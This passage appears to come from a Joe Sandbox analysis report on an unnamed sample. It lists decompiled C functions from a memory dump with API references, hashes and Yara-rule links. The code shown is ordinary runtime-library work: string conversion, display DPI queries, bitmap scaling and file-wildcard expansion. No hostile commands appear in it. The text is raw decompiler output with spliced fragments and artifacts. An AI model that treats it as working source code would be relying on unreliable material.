				_v64 = _t80;
				_v60 = 0x800;
				_v40 = 0x1080c;
				_push( &_v92);
				if(_t67 == 0) {
					_t52 =  *0xa93044();
				} else {
					_t52 =  *0xa9303c();
				}
				_t85 = _t52;
				if(_t85 == 0) {
					_t52 =  *0xa93040();
					if(_t52 == 0x3002) {
						 *_t80 = 0;
						_push( &_v92);
						if(_t67 == 0) {
							_t52 =  *0xa93044();
						} else {
							_t52 =  *0xa9303c();
						}
						_t85 = _t52;
					}
					_t97 = _t85;
				}
				return _t52 & 0xffffff00 | _t97 != 0x00000000;
			}

0x00a3110c
0x00a3110f
0x00a3111c
0x00a31123
0x00a31137
0x00a3114d
0x00a3115c
0x00a3115c
0x00a3117c
0x00a31191
0x00a311a3
0x00a311a9
0x00a311b2
0x00a311ba
0x00a311be
0x00a311c9
0x00a311cc
0x00a311cf
0x00a311d7
0x00a311e0
0x00a311e6
0x00a311ec
0x00a311ef
0x00a311f2
0x00a311f9
0x00a31200
0x00a31203
0x00a3120d
0x00a31205
0x00a31205
0x00a31205
0x00a31213
0x00a31217
0x00a31219
0x00a31224
0x00a31228
0x00a3122e
0x00a31231
0x00a3123b
0x00a31233
0x00a31233
0x00a31233
0x00a31241
0x00a31241
0x00a31243
0x00a31243
0x00a3124c

APIs

_wcslen.LIBCMT ref: 00A3112B
_wcslen.LIBCMT ref: 00A31153
_wcslen.LIBCMT ref: 00A31182
_wcslen.LIBCMT ref: 00A311A9

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: b37b5d50c5e5efa900e15d3d73d49185f1616e2cb1b7e62eeac9866b7deb4434
Instruction ID: ca7395c4ee9c85b8d91c78557b43ff6b83d691bd4dfc24a79fc7e3c6ad5484ea
Opcode Fuzzy Hash: b37b5d50c5e5efa900e15d3d73d49185f1616e2cb1b7e62eeac9866b7deb4434
Instruction Fuzzy Hash: FC41DA71A006655BCB11DFA88D0A9DFBBB8EF40311F00002AFD46F7245DF34AE498BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C988 Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00A5C988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t54;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t66;
				short* _t67;
				signed int _t68;
				short* _t69;

				_t65 = __edx;
				_t34 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t34 ^ _t68;
				E00A54636(_t55,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x2de85006
					_t54 =  *_t6;
					_t57 = _t54;
					_a24 = _t54;
				}
				_t66 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00A4FBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t67 = 0;
					L11:
					if(_t67 != 0) {
						E00A4FFF0(_t66, _t67, _t66, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
						if(_t46 != 0) {
							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
						}
					}
					L14:
					E00A5ABC3(_t67);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t67 = E00A58E06(_t63, _t48 & _t63);
					if(_t67 == 0) {
						goto L14;
					}
					 *_t67 = 0xdddd;
					L9:
					_t67 =  &(_t67[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00A62010(_t48 & _t63);
				_t67 = _t69;
				if(_t67 == 0) {
					goto L14;
				}
				 *_t67 = 0xcccc;
				goto L9;
			}

0x00a5c988
0x00a5c990
0x00a5c997
0x00a5c9a3
0x00a5c9a8
0x00a5c9ad
0x00a5c9b2
0x00a5c9b2
0x00a5c9b5
0x00a5c9b7
0x00a5c9b7
0x00a5c9bc
0x00a5c9d5
0x00a5c9db
0x00a5c9e0
0x00a5ca7f
0x00a5ca83
0x00a5ca88
0x00a5ca88
0x00a5caa4
0x00a5caa4
0x00a5c9e6
0x00a5c9ee
0x00a5c9f2
0x00a5ca3e
0x00a5ca40
0x00a5ca42
0x00a5ca47
0x00a5ca5e
0x00a5ca66
0x00a5ca76
0x00a5ca76
0x00a5ca66
0x00a5ca78
0x00a5ca79
0x00000000
0x00a5ca7e
0x00a5c9f9
0x00a5c9fb
0x00a5c9fd
0x00a5ca05
0x00a5ca22
0x00a5ca2c
0x00a5ca31
0x00000000
0x00000000
0x00a5ca33
0x00a5ca39
0x00a5ca39
0x00000000
0x00a5ca39
0x00a5ca09
0x00a5ca0d
0x00a5ca12
0x00a5ca16
0x00000000
0x00000000
0x00a5ca18
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00A547C6,00000000,00000000,00A557FB,?,00A557FB,?,00000001,00A547C6,2DE85006,00000001,00A557FB,00A557FB), ref: 00A5C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A5CA70
__freea.LIBCMT ref: 00A5CA79

Part of subcall function 00A58E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A54286,?,0000015D,?,?,?,?,00A55762,000000FF,00000000,?,?), ref: 00A58E38

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 102aff46ef686726f71a586d0580c228c8376c375d81f773871317e3e9d9f66e
Instruction ID: 44e567c06a211345c8d367c45e24700bab55c958c3c79f3c58adecf9d1d26f3c
Opcode Fuzzy Hash: 102aff46ef686726f71a586d0580c228c8376c375d81f773871317e3e9d9f66e
Instruction Fuzzy Hash: 0331CD32A0021AAFDF24CF64DC41EAE7BA6FB41361B044228FD04E7255EB35DD59CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A663 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4A663() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xa78430 = GetDeviceCaps(_t5, 0x58);
					 *0xa78434 = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x00a4a666
0x00a4a66c
0x00a4a670
0x00a4a67e
0x00a4a68c
0x00000000
0x00a4a691
0x00a4a698

APIs

GetDC.USER32(00000000), ref: 00A4A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A4A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A4A683
ReleaseDC.USER32(00000000,00000000), ref: 00A4A691

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7713e6303daca65237eb9db5f792d93aade65603b6c377ba856265e2bc14db21
Instruction ID: ea5e1fe6d66ea4fc36bf8c5f316dcf17910b79abbd4549be3e86987ca944ba21
Opcode Fuzzy Hash: 7713e6303daca65237eb9db5f792d93aade65603b6c377ba856265e2bc14db21
Instruction Fuzzy Hash: 03E01D36A92731B7D751DBE47C0DB8F3E78AB15B52F014102F605A51D0DF7845428B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00A4A80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t97;
				signed int _t100;
				intOrPtr* _t103;
				intOrPtr* _t106;
				short _t114;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				intOrPtr* _t130;
				signed int _t133;
				intOrPtr* _t139;
				intOrPtr* _t143;
				void* _t148;
				signed int _t150;
				intOrPtr* _t156;
				intOrPtr* _t166;
				intOrPtr* _t169;
				char _t180;
				void* _t182;
				intOrPtr* _t186;
				signed int _t198;
				long long* _t202;
				long long _t204;

				_t204 = __fp0;
				_t202 =  &_v112;
				if(E00A4A699() != 0) {
					_t148 = _a4;
					GetObjectW(_t148, 0x18,  &_v68);
					_t150 = _v4;
					asm("cdq");
					_t198 = _v72 * _t150 / _v76;
					if(_t198 >= _v0) {
						_t198 = _v0;
					}
					if(_t150 != _v76 || _t198 != _v72) {
						_t180 = 0;
						_push( &_v124);
						_push(0xa64754);
						_push(1);
						_push(0);
						_push(0xa6555c);
						if( *0xa93188() >= 0) {
							_t94 = _v144;
							 *0xa63278(_t94, _t148, 0, 2,  &_v140, _t182);
							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
							_t97 = _v164;
							if(_t96 < 0) {
								L14:
								 *0xa63278(_t97);
								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
								L21:
								_t100 =  *0xa930e4(_t148, _t180, _t180, _t180, _t180);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
							_t156 = _t186;
							 *0xa63278(_t97,  &_v156);
							if( *_t186() < 0) {
								L13:
								_t103 = _v168;
								 *0xa63278(_t103);
								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
								_t97 = _v176;
								goto L14;
							}
							_t106 = _v164;
							asm("fldz");
							 *_t202 = _t204;
							 *0xa63278(_t106, _v168, 0xa6556c, 0, 0, _t156, _t156, 0);
							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
								_v132 = _v84;
								_v116 = 0;
								_v128 =  ~_t198;
								_v112 = 0;
								_v124 = 1;
								_t114 = 0x20;
								_v122 = _t114;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								_v96 = 0;
								_v136 = 0x28;
								_v120 = 0;
								_v184 = 0;
								_t117 =  *0xa93058(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t117;
								if(_t117 != 0) {
									_t166 = _v228;
									 *0xa63278(_t166,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
									_t130 = _v224;
									 *0xa63278(_t130, _v232, _v116, _t198, 3);
									 *((intOrPtr*)( *_t130 + 0x20))();
									_t133 = _v136;
									_t169 = _v244;
									_v216 = _t198;
									_v220 = _t133;
									_v228 = 0;
									_v224 = 0;
									 *0xa63278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t139 = _v268;
									 *0xa63278(_t139);
									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
								}
								_t118 = _v224;
								 *0xa63278(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v224;
								 *0xa63278(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t124 = _v236;
								 *0xa63278(_t124);
								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
								_t100 = _v220;
								if(_t100 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t143 = _v196;
							 *0xa63278(_t143);
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t180 = 0;
						L8:
						_t100 =  *0xa930e4(_t148, _t180, _t180, _t180, _t180);
						L23:
						return _t100;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00A4AAC9();
			}

0x00a4a80c
0x00a4a80c
0x00a4a816
0x00a4a82f
0x00a4a83c
0x00a4a846
0x00a4a850
0x00a4a855
0x00a4a85e
0x00a4a860
0x00a4a860
0x00a4a86c
0x00a4a87c
0x00a4a87e
0x00a4a87f
0x00a4a887
0x00a4a888
0x00a4a889
0x00a4a896
0x00a4a8a8
0x00a4a8bc
0x00a4a8c2
0x00a4a8c7
0x00a4a8cb
0x00a4a940
0x00a4a948
0x00a4a94e
0x00a4aab4
0x00a4aab9
0x00a4aabf
0x00000000
0x00a4aabf
0x00a4a8cd
0x00a4a8d9
0x00a4a8dc
0x00a4a8de
0x00a4a8e8
0x00a4a928
0x00a4a928
0x00a4a934
0x00a4a93a
0x00a4a93c
0x00000000
0x00a4a93c
0x00a4a8ea
0x00a4a8ee
0x00a4a8f5
0x00a4a907
0x00a4a912
0x00a4a95c
0x00a4a964
0x00a4a968
0x00a4a971
0x00a4a975
0x00a4a97a
0x00a4a97d
0x00a4a98c
0x00a4a995
0x00a4a99c
0x00a4a9a3
0x00a4a9aa
0x00a4a9b2
0x00a4a9b6
0x00a4a9ba
0x00a4a9c0
0x00a4a9c6
0x00a4a9cc
0x00a4a9dd
0x00a4a9e3
0x00a4a9e5
0x00a4a9fd
0x00a4aa03
0x00a4aa06
0x00a4aa11
0x00a4aa15
0x00a4aa1c
0x00a4aa23
0x00a4aa27
0x00a4aa3b
0x00a4aa46
0x00a4aa56
0x00a4aa48
0x00a4aa4c
0x00a4aa4c
0x00a4aa5c
0x00a4aa68
0x00a4aa6e
0x00a4aa6e
0x00a4aa70
0x00a4aa7c
0x00a4aa82
0x00a4aa84
0x00a4aa90
0x00a4aa96
0x00a4aa98
0x00a4aaa4
0x00a4aaaa
0x00a4aaac
0x00a4aab2
0x00000000
0x00000000
0x00000000
0x00000000
0x00a4aab2
0x00a4a914
0x00a4a920
0x00a4a926
0x00000000
0x00a4a926
0x00000000
0x00a4a874
0x00a4a874
0x00a4a898
0x00a4a89d
0x00a4aac0
0x00000000
0x00a4aac2
0x00a4a86c
0x00a4a818
0x00a4a81c
0x00a4a820
0x00000000

APIs

Part of subcall function 00A4A699: GetDC.USER32(00000000), ref: 00A4A69D
Part of subcall function 00A4A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A4A6A8
Part of subcall function 00A4A699: ReleaseDC.USER32(00000000,00000000), ref: 00A4A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00A4A83C

Part of subcall function 00A4AAC9: GetDC.USER32(00000000), ref: 00A4AAD2
Part of subcall function 00A4AAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00A4A829,?,?,?), ref: 00A4AB01
Part of subcall function 00A4AAC9: ReleaseDC.USER32(00000000,?), ref: 00A4AB99

Strings

(, xrefs: 00A4A9AA

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 439fb5433146d2429ae65336723ef9783c183e348f9961d4e1ff844cccc7cd7b
Instruction ID: 1a38d40b0b4776d1628407d38ca4ceeb9ed4b7ed94803db6c1c10b1116aaddff
Opcode Fuzzy Hash: 439fb5433146d2429ae65336723ef9783c183e348f9961d4e1ff844cccc7cd7b
Instruction Fuzzy Hash: 9A91E0B5608354AFDA11DF65C854A6BBBF8FFD8700F00491EF59AD3260DB70A906CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00A5B1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				void* _t155;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				union _FINDEX_INFO_LEVELS _t201;
				void* _t202;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;
				intOrPtr _t212;
				void* _t213;
				void* _t214;
				signed int _t217;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				signed int _t224;
				void* _t225;
				void* _t226;

				_t80 = _a8;
				_t222 = _t221 - 0x20;
				if(_t80 != 0) {
					_t206 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t197 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t206;
					if( *_t206 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t197;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t197;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t208;
						if(_t208 != 0) {
							_t195 = _t197;
							_t157 = _t159;
							do {
								_t183 =  *_t195;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t195 = _t195 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t208;
							} while (_t144 != _t208);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t209 = E00A58207(_t190, _v8, 1);
						_t223 = _t222 + 0xc;
						__eflags = _t209;
						if(_t209 != 0) {
							_t87 = _t209 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t197 - _t150;
							if(_t197 == _t150) {
								L23:
								_t198 = 0;
								__eflags = 0;
								 *_a8 = _t209;
								goto L24;
							} else {
								_t93 = _t209 - _t197;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t197;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00A5F101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
									_t223 = _t223 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00A59097();
										asm("int3");
										_t219 = _t223;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t197);
										_t200 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
											_push(_t150);
											_t50 = _t200 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t211 = E00A5B136(_t166, _t153, 1);
											_t168 = _t209;
											__eflags = _t200;
											if(_t200 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t200;
												_t108 = E00A5F101(_t168, _t211 + _t200, _t153, _v0);
												_t224 = _t223 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00A5B587(_a12, _t192, __eflags, _t211);
													E00A58DCC(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t200);
												_t139 = E00A5F101(_t168, _t211, _t153, _a4);
												_t224 = _t223 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00A59097();
													asm("int3");
													_push(_t219);
													_t220 = _t224;
													_t225 = _t224 - 0x150;
													_t111 =  *0xa6e7ac; // 0xa7a040ce
													_v116 = _t111 ^ _t220;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t211);
													_t212 = _v96;
													_push(_t200);
													_v440 = _t212;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00A5F150(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t201 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00A4FFF0(_t201,  &_v336, _t201, 0x140);
														_t226 = _t225 + 0xc;
														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
														_t123 = _v340;
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t226 = _t226 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t213,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t193 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00A56310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E00A5B1A0);
															}
														} else {
															_push(_t123);
															_push(_t201);
															_push(_t201);
															_push(_t154);
															L28();
															L54:
															_t201 = _t123;
														}
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															FindClose(_t213);
														}
														_t124 = _t201;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t212);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													_pop(_t202);
													_pop(_t214);
													__eflags = _v16 ^ _t220;
													_pop(_t155);
													return E00A4FBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t194 = _v16;
									 *((intOrPtr*)(_v24 + _t197)) = _t194;
									_t197 = _t197 + 4;
									_t191 = _t194 + _v12;
									_v16 = _t194 + _v12;
									__eflags = _t197 - _t150;
								} while (_t197 != _t150);
								goto L23;
							}
						} else {
							_t198 = _t197 | 0xffffffff;
							L24:
							E00A58DCC(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00A5F110( *_t206,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t206);
								L38();
								_t222 = _t222 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t206);
								L28();
								_t222 = _t222 + 0x10;
							}
							_t198 = _t146;
							__eflags = _t198;
							if(_t198 != 0) {
								break;
							}
							_t206 = _t206 + 4;
							_t159 = 0;
							__eflags =  *_t206;
							if( *_t206 != 0) {
								continue;
